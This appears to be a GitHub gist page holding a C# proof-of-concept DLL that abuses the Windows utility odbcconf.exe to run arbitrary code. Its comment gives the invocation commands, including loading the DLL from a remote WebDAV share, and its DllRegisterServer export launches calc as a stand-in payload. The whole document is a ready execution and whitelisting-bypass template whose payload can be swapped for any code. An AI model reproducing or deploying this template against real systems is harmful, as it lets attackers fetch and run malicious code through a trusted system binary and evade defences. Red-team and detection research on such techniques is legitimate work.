Skip to content

Instantly share code, notes, and snippets.

@jesusninoc
Forked from Arno0x/odbcconf.cs
Created January 7, 2018 21:03
Show Gist options
  • Save jesusninoc/ed395b0fb00b10472f09ec232b2bd240 to your computer and use it in GitHub Desktop.
Save jesusninoc/ed395b0fb00b10472f09ec232b2bd240 to your computer and use it in GitHub Desktop.
Download and execute arbitrary code with odbcconf.exe
/*
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
namespace odbcconf
{
public class RegSvr
{
[DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
public static bool DllRegisterServer()
{
Process proc = Process.Start(new ProcessStartInfo { FileName = "calc" });
return true;
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment